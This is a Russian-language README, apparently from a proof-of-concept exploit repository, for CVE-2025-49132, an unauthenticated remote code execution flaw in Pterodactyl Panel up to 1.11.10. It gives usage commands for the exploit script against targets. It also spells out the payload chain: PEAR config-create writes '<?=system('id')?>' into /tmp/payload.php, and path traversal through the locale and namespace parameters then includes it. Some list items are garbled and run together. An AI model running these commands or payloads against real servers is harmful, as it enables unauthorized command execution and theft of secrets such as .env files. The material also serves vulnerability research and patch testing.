
Эксплойт PoC для CVE-2025-49132 (GHSA-24wv-6c99-f843) – Неавторизованное удалённое выполнение кода в Pterodactyl Panel ≤ 1.11.10
Pterodactyl Panel - Неаутентифицированное удаленное выполнение кода (RCE)
CVE‑2025‑49132 — это критическая уязвимость удаленного выполнения кода, затрагивающая Pterodactyl Panel <= 1.11.10.
Неаутентифицированный злоумышленник может использовать неправильную проверку входных данных в конечной точке /locales/locale.json для выполнения произвольных системных команд.
Исправлено в версии: 1.11.11
Успешная эксплуатация позволяет:
.env)Серьезность: Критическая
Уязвимость существует из-за неправильной проверки:
localenamespaceЗлоумышленник может:
../../../../../)config-create/tmpКлассификация слабости: CWE-94 — Неправильный контроль генерации кода
python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR
Путь по умолчанию:
/usr/share/php/PEAR
Получить правильный путь со страницы /phpinfo.php

Злоумышленник внедряет вредоносную PHP-полезную нагрузку в /tmp/payload.php с помощью:
/<?=system('id')?>+/tmp/payload.php
Вызовом:
?locale=../../../../../tmp&namespace=payload
Сервер выполняет внедренный PHP.

locale и namespace